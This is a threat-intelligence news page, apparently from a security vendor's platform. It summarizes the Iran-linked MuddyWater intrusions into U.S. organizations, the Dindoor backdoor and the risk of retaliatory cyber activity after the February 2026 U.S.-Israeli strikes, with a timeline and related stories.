Iran-linked MuddyWater intrusions and heightened retaliation risk after U.S.-Israeli strikes
Following the Feb. 28, 2026 U.S.-Israeli strikes on Iran, reporting indicates a heightened risk of Iranian retaliatory cyber activity against U.S. and allied organizations, with expected operations spanning ransomware, DDoS (including as cover for deeper intrusions), data leaks from prior exfiltration, and aggressive social engineering (e.g., fake job offers and malicious attachments). Likely target sets highlighted include critical infrastructure, banking, and environments involving industrial control systems/PLCs, with emphasis on disciplined execution of security fundamentals (patching, log review, and tighter email/attachment handling) rather than overreliance on automation.
Separately, MuddyWater (Seedworm), an Iran-linked APT, was reported active in multiple U.S. organizations since early Feb. 2026, with activity increasing after the strikes. Symantec and Carbon Black researchers described targeting that included a U.S. bank, an airport, a non-profit, and the Israel operation of a U.S. software company supplying the defense/aerospace sector, and identified a previously unknown backdoor, Dindoor, observed in several victims; Dindoor executes via Deno (a JavaScript/TypeScript runtime). Commentary in the reporting also warned to assume potential pre-positioning in high-value targets and recommended proactive hunting for signs of persistent access before activation.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
8 events from the most recent confirmed update back to the earliest known activity.
Augur reports broader Iranian threat activity and hacktivist activation
Augur Security reported elevated activity from multiple Iranian threat groups, including APT33, APT34, APT35, CyberAv3ngers, and Cotton Sandstorm, in the period surrounding the strikes. It also said at least 60 hacktivist groups, including Handala and Cyber Fattah, were activated by Iran after the U.S.-Israel attacks.
Expel reports no confirmed Iran-linked incidents in customer environments
As of early March 2026, Expel said it had not confirmed any Iran-related incidents in its customer environments despite warning of elevated retaliatory cyber risk. The company advised organizations to harden defenses and monitor for Iranian tradecraft and infrastructure shifts.
Researchers identify Dindoor backdoor on victim networks
Broadcom researchers discovered a previously unknown backdoor called Dindoor on several victim networks. The malware was noted for executing via Deno, adding new technical detail to the campaign.
Ayatollah Ali Khamenei dies
Reporting on the campaign linked the apparent retaliatory Iranian cyber activity to the death of Ayatollah Ali Khamenei. The death was cited as occurring on March 1, 2026.
MuddyWater activity intensifies after the strikes on Iran
Researchers said MuddyWater's operations escalated after the February 28 U.S.-Israeli attack on Iran and assessed the campaign as likely retaliatory. The activity was also linked in reporting to the death of Ayatollah Ali Khamenei on March 1.
U.S. and Israeli forces strike Iran
Coordinated U.S. and Israeli strikes against Iran took place on February 28, 2026. Multiple security reports cited the operation as the trigger for heightened concern over Iranian retaliatory cyber activity.
MuddyWater begins activity inside multiple U.S. networks
Broadcom's Symantec and Carbon Black reported that MuddyWater had been active inside multiple U.S. company networks since early February 2026. Identified victims included a U.S. bank, an airport, a non-profit, and the Israeli operation of a U.S. software company serving the defense and aerospace sector.
MuddyWater stages attack infrastructure in September 2025
Augur Security observed more than half a dozen CIDR blocks linked to MuddyWater during a 72-hour period in September 2025, most associated with an Estonian ASN provider. Researchers later assessed with medium confidence that this buildup was preparation for cyber operations following the later U.S.-Israel strikes on Iran.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
2 references tracked. Mallory keeps watching after this page renders.
See the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
MuddyWater (Seedworm) Espionage Campaign Using Dindoor Backdoor Against U.S. Organizations
Security researchers reported a cyber-espionage campaign attributed to Iran-linked **MuddyWater** (aka **Seedworm**), assessed as operating under Iran’s **Ministry of Intelligence and Security (MOIS)**, targeting multiple U.S.-based organizations and related operations. Victims cited across reporting include a **U.S. airport**, a **U.S. bank**, **non-governmental/non-profit organizations** in North America, and the **Israeli operations of a U.S. software supplier** connected to the defense and aerospace sector—indicating interest in both critical infrastructure-adjacent environments and the defense supply chain. The intrusions were described as beginning in **early 2026** (with Symantec/Carbon Black tracking activity starting in early February) and focused on establishing and maintaining access consistent with long-term intelligence collection. One report highlighted deployment of a newly observed backdoor, **Dindoor**, alongside additional tooling to sustain persistence in victim networks, while broader analysis framed the activity as potentially aligned with heightened regional tensions and warned that Iranian-aligned actors may continue reconnaissance and access operations; organizations were advised to increase monitoring and defensive readiness, particularly where exposed services could enable initial access.
Mar 23, 2026
Iran Retaliation Cyber Risk After U.S. and Israeli Strikes
Coordinated U.S. and Israeli strikes on Iranian targets have raised expectations of **Iranian state-aligned cyber retaliation** against U.S., Israeli, and allied interests. Reporting and vendor intelligence assessments warn that Iran has historically paired kinetic escalation with cyber operations ranging from *low-level disruption* (website defacements and DDoS) to *higher-impact activity* (ransomware-style disruption, hack-and-leak operations, espionage, and destructive/wiper malware), with likely targeting pressure on government, critical infrastructure, defense, financial services, academia, and media. The situation is described as fast-moving, with no definitive public attribution yet tying major new cyber campaigns directly to the latest strikes. Separately, multiple reports highlight **unrelated** security issues: GreyNoise observed large-scale reconnaissance and SSL VPN enumeration against **SonicWall SonicOS** devices via commercial proxy infrastructure—activity consistent with precursor targeting that often precedes credential attacks and ransomware intrusions. CISA also issued updated technical details on **RESURGE**, a stealthy implant used in zero-day exploitation of **Ivanti Connect Secure** via `CVE-2025-0282`, including passive C2 behavior and TLS-fingerprint-based authentication/evasion; Mandiant linked the exploitation to China-nexus activity (UNC5221). Other items in the set include a generic IoT security pitfalls article, a weekly security roundup, and a conference write-up, none of which materially advance the Iran-retaliation storyline.
May 14, 2026
Iranian Cyber Operations Shift Toward Identity Abuse and Broader Hybrid Targeting
Iranian state-aligned and affiliated cyber activity has expanded beyond traditional disruptive malware into a broader campaign of **hybrid operations** that combines espionage, reconnaissance, credential abuse, and destructive effects. Reporting describes a tactical shift from bespoke wipers toward **living-off-the-land** methods, including the compromise of highly privileged identities and the use of legitimate enterprise administration capabilities to issue remote-wipe actions at scale. At the same time, Iranian operators and aligned personas have been linked to sustained access into US organizations in sectors including banking, aviation, defense-adjacent industries, and healthcare, while also targeting internet-connected surveillance infrastructure in the Middle East for intelligence collection and battlefield awareness. The activity is unfolding alongside a wider surge in hostile traffic associated with the regional conflict, with major increases in infrastructure scanning, automated reconnaissance, credential harvesting, and DDoS preparation against critical businesses, especially **banking and fintech**. One report highlights **Handala/Void Manticore** as emblematic of the disruptive trend, while another ties **MuddyWater** to persistent footholds in US networks and notes exploitation of camera vulnerabilities such as `CVE-2017-7921` and `CVE-2021-33044`. Together, the reporting indicates that Iranian cyber operations remain active and adaptive, using proxy infrastructure, compromised identities, and exposed edge devices to sustain pressure on commercial and strategic targets without relying solely on custom malware.
May 14, 2026